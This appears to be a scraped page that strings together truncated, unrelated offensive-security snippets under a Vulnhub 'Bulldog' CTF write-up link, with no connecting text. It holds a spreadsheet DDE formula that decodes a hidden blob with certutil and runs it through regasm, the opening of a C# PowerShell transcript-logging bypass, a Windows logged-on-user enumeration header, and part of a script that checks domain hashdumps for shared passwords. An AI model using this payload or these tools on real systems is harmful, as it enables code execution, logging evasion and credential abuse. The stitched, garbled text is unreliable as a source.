The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Bulldog-Vulnhub-NonIntro.html
A fun box from Vulnhub, written by Nick Frichette. You can find it here at https://www.vulnhub.com/entry/bulldog-1,211/
| #!/usr/bin/env python | |
| # Copyright (c) 2012-2018 CORE Security Technologies | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # Gets logged on users via NetrWkstaUserEnum (requires admin on targets). | |
| # Mostly adapted from netview.py and lookupsid.py | |
| # |
A fun box from Vulnhub, written by Nick Frichette. You can find it here at https://www.vulnhub.com/entry/bulldog-1,211/
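Each of these commands will run an ad hoc HTTP static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely: these servers have no authentication, and several of them (Python's SimpleHTTPServer among them) listen on all network interfaces by default, so every file under the served directory may be readable by other hosts on the network, not only from localhost.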
$ python -m SimpleHTTPServer 8000
| import os | |
| import subprocess | |
| import ctypes | |
| # See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
| svcinfo = {} | |
| nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG'] | |
| FNULL = open(os.devnull, 'w') |
| =cmd|' /c more +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| using System; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Security; | |
| using System.Management.Automation.Runspaces; | |
| using System.Reflection; | |
| namespace TranscriptBypass | |
| { | |
| // Compiling with CSC.exe v4.0.30319 or v3.5 |
| #!/usr/bin/env python3 | |
| #Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller | |
| #Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH::: | |
| # ./check_hashes.py <hash_dump> | |
| import sys | |
| hashes = {} | |
| with open(sys.argv[1]) as infile: |